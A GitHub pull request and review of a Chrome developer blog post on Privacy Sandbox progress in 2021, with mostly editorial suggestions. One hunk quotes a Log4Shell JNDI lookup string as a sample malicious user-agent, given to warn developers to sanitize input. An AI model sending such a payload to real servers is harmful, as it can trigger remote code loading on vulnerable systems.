### PR TITLE
Blog post: Progress in the Privacy Sandbox (December 2021)

### PR DESCRIPTION
**Pull request by rowan-m**
Monthly post with a 2021 wrap-up.
[Draft](https://docs.google.com/document/d/1GXZiW_2JEquzSPN_66eW_gp1a85T6XM5zdDzGZXnTgw/edit?resourcekey=0-mkWkZW79Urrf_VputjTpzg) reviewed internally
Preview here: https://deploy-preview-1915--developer-chrome-com.netlify.app/blog/progress-in-the-privacy-sandbox-2021-12/

### CODE REVIEW

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 1]
```diff
@@ -0,0 +1,196 @@
...
+hero: 'image/VWw0b3pM7jdugTkwI6Y81n6f5Yc2/Ut0IykTaEFBuOA5EHqbg.png'
+alt: >
+  Privacy Sandbox logo
+tags:
+  - progress-in-the-privacy-sandbox
+  - privacy
+---
+
+Welcome to the 2021 wrap-up edition of **[Progress in the Privacy
+Sandbox](/tags/progress-in-the-privacy-sandbox/)** tracking the milestones on
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:18]:
```suggestion
Sandbox](/tags/progress-in-the-privacy-sandbox/)**, tracking the milestones on
```

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 2]
```diff
@@ -0,0 +1,196 @@
...
+IETF. This is also where coding begins, which means you can **expect the
+prototype functionality to be made available for developer testing behind a
+[feature
+flag](https://www.chromium.org/developers/how-tos/run-chromium-with-flags)**.
+Initial feedback is critical for validating and iterating on proposals.
+
+An **Intent to Experiment** is an optional step if we’d like to request an
+origin trial. Developers **can [sign up for the origin
+trial](/blog/origin-trials/)** of a feature, and then **test  it on your
+production site**. It's called an experiment because we have specific aspects of
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:60]: May this should be:

> Developers **can sign up for the origin trial** of a feature, and then **test it in production**.

Removing the "you" so it's not third-person and second-person in the same sentence.

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 3]
```diff
@@ -0,0 +1,196 @@
...
+    * mobile device name
+4. These are the values that will be reduced to fixed strings in the future. If
+   you need access to these values, [migrate to User-Agent Client
+   Hints](https://web.dev/migrate-to-ua-ch/).
+
+There is one December update to mention—if you are adopting User-Agent Client
+Hints then we have sent the **Intent to Ship to [enable delegating hints to
+other origins in
+HTML](https://groups.google.com/a/chromium.org/g/blink-dev/c/JQ68cvYuiQU/m/S_33YSqxCwAJ)**
+via a `<meta>` tag, for example:
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:129]:
```suggestion
via a `<meta>` tag. For example:
```

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 4]
```diff
@@ -0,0 +1,196 @@
...
+3. Check your use of the string for anywhere you rely on the:
+    * platform (operating system) version
+    * full Chrome build version
+    * mobile device name
+4. These are the values that will be reduced to fixed strings in the future. If
+   you need access to these values, [migrate to User-Agent Client
+   Hints](https://web.dev/migrate-to-ua-ch/).
+
+There is one December update to mention—if you are adopting User-Agent Client
+Hints then we have sent the **Intent to Ship to [enable delegating hints to
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:126]:
```suggestion
Hints, we have sent the **Intent to Ship to [enable delegating hints to
```

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 5]
```diff
@@ -0,0 +1,196 @@
...
+other origins in
+HTML](https://groups.google.com/a/chromium.org/g/blink-dev/c/JQ68cvYuiQU/m/S_33YSqxCwAJ)**
+via a `<meta>` tag, for example:
+
+```html
+<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">`
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:132]:
```suggestion
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
```

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 6]
```diff
@@ -0,0 +1,196 @@
...
+detect mobile devices, then investigate if you can replace this with responsive
+design. If you're checking the browser name and version for feature support, see
+if you can use feature detection instead.
+
+It's always worth remembering that the user-agent, like any client provided
+value, is not guaranteed to be accurate or even provided. The recent [Log4j
+vulnerability, "Log4shell"](https://logging.apache.org/log4j/2.x/security.html)
+provides an example of this risk. A client that sets its user-agent string to
+include a value like `${jndi:ldap://example.com/file}` may be able to get a site
+to actively parse that on the server. It's critical that you treat user-agent in
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:146]:
```suggestion
to actively parse that on the server.

It's critical that you treat user-agent in
```

Separating this sentence from the paragraph as it should get attention and not risk the end-of-paragraph skim.

File: site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md [hunk 7]
```diff
@@ -0,0 +1,196 @@
...
+the same way as any other form of user input: sanitize and validate it before
+acting on the value.
+
+### Cookie cataloguing
+
+Another traditional new year activity is to make sure you're happy you have a
```
Comment (heyawhite) [inline site/en/blog/progress-in-the-privacy-sandbox-2021-12/index.md:152]:
```suggestion
Another traditional new year activity is to make sure you're happy that you have a
```

the "that" could also be "and", depending on your intended meaning.

**Review by heyawhite — APPROVED** [review]
A couple nits, but overall LGTM

**Comment by rowan-m** [comment]
Nits combed out, thank you! Will merge after re-checking preview.

**Pull request merged**